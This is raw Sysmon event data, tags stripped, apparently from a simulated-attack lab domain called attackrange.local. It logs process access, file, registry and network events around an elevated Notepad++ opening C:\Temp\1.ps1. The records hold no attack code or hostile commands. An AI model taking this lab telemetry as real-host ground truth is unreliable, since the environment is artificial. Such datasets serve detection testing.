07:53:17.848{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049213Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.611{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1E7DA95F3DD308CF4F59AC89A7BD32D,SHA256=CD0EE5A54CFE2EA15CFBF1D814AC4021EADFC9EDD0AB933C3B10BB0C3F7DF519,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049276Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.951{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2D6A8596644251D852CF14C08D32EE44,SHA256=0F7AAFF03CE7FFB808DC06BA4287590DAEF48BA6EC81D1031469D1BFCE0673D5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049275Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.751{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049274Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.751{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049273Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.751{466BC892-32D3-60E8-770B-00000000CF01}635610084C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049272Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.751{466BC892-32D3-60E8-770B-00000000CF01}635610084C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049271Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.751{466BC892-32D3-60E8-770B-00000000CF01}635610084C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049270Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.614{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=334C2F414B5E9DD51BCC55D5A61D51B6,SHA256=27B5797C3A52508407DB43EF8769071DF26FF0DDAFB764EBCC3C7197473B1712,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807712Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:16.573{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57277-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000807711Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:18.194{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69913F29EEF384D0688F7722FC32FB90,SHA256=EF9439C140D4F6B891B68550AB721C37FC2E04C5C005F54B2567F36E042A983A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049269Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.495{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049268Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.495{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049267Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.448{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049266Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.429{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049265Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.429{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049264Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.364{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDCF3453CF8EE640B5B4C5B00B2659D7,SHA256=92B26786174C6B2058B726897C578F2694AD9DDDF38E08FB197096A5DB5AF631,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049263Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.310{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049262Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.295{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049261Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.295{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 23542300x80000000000000001049260Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.279{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\session.xmlMD5=DA1208D94E9033F38833BC9F444D31F8,SHA256=4C98AD479E9B783AE7BE148610107981758F6626D16C0B36204AD67ACD6751F7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049259Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.265{466BC892-02AF-60E8-1400-00000000CF01}10285088C:\Windows\System32\svchost.exe{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001049258Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localInvDB-VerSetValue2021-07-12 07:53:18.265{466BC892-02AF-60E8-1400-00000000CF01}1028C:\Windows\System32\svchost.exe\REGISTRY\A\{9f972113-78f6-bff2-599d-b5479e19cde8}\Root\InventoryApplicationFile\notepad++.exe|9b63189e96115672\BinProductVersion8.1.1.0 13241300x80000000000000001049257Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localInvDB-CompileTimeClaimSetValue2021-07-12 07:53:18.265{466BC892-02AF-60E8-1400-00000000CF01}1028C:\Windows\System32\svchost.exe\REGISTRY\A\{9f972113-78f6-bff2-599d-b5479e19cde8}\Root\InventoryApplicationFile\notepad++.exe|9b63189e96115672\LinkDate07/01/2021 12:16:04 13241300x80000000000000001049256Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localInvDB-PubSetValue2021-07-12 07:53:18.265{466BC892-02AF-60E8-1400-00000000CF01}1028C:\Windows\System32\svchost.exe\REGISTRY\A\{9f972113-78f6-bff2-599d-b5479e19cde8}\Root\InventoryApplicationFile\notepad++.exe|9b63189e96115672\Publisherdon ho don.h@free.fr 13241300x80000000000000001049255Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localInvDB-PathSetValue2021-07-12 07:53:18.265{466BC892-02AF-60E8-1400-00000000CF01}1028C:\Windows\System32\svchost.exe\REGISTRY\A\{9f972113-78f6-bff2-599d-b5479e19cde8}\Root\InventoryApplicationFile\notepad++.exe|9b63189e96115672\LowerCaseLongPathc:\program files\notepad++\notepad++.exe 354300x80000000000000001049254Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:09.966{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57277-false10.0.1.14win-dc-890.attackrange.local49676- 13241300x80000000000000001049253Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localInvDBSetValue2021-07-12 07:53:18.179{466BC892-02AF-60E8-1400-00000000CF01}1028C:\Windows\System32\svchost.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Program Files\Notepad++\notepad++.exeBinary Data 10341000x80000000000000001049252Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.163{466BC892-02AF-60E8-1400-00000000CF01}10285432C:\Windows\System32\svchost.exe{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049251Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.163{466BC892-02AF-60E8-1400-00000000CF01}10285432C:\Windows\System32\svchost.exe{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+5bab|c:\windows\system32\pcasvc.dll+5b07|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049250Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.163{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049249Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.163{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049248Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.163{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049247Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.163{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049246Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.163{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049245Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.163{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\appinfo.dll+2073|c:\windows\system32\appinfo.dll+3c57|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+29cc|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049244Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.152{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe8.11Notepad++ : a free (GPL) source code editorNotepad++Don HO don.h@free.frnotepad++.exe"C:\Program Files\Notepad++\notepad++.exe" -multiInstC:\Program Files\Notepad++\ATTACKRANGE\Administrator{466BC892-F4ED-60EB-AA0C-FC0400000000}0x4fc0caa3HighMD5=3433991765511375D3EC11B4FE290298,SHA256=B30DDA913768A864106485E51682E90286D320023221F5676A42CC9B914A11F8,IMPHASH=B65402F137E08F6E43CEEF2CF25E0CC2{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe"C:\Program Files\Notepad++\notepad++.exe" "C:\Temp\1.ps1" 10341000x80000000000000001049243Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 